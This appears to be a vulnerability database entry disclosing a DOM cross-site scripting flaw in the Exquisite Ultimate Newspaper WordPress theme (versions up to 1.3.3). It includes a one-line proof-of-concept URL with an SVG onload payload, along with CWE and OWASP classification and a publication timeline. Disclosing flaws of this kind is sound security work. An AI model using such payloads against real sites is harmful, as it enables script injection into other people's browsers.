Exquisite Ultimate Newspaper Theme <= 1.3.3 - DOM Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/#<svg/onload=prompt(document.domain)>

Affects Theme

References

PACKETSTORM 131657
URL http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter pvdl
Views 4612
Verified No
WPVDB ID 7980

Timeline

Publicly Published 2015-04-26 (over 4 years ago)
Added 2015-05-12 (over 4 years ago)
Last Updated 2015-05-15 (over 4 years ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin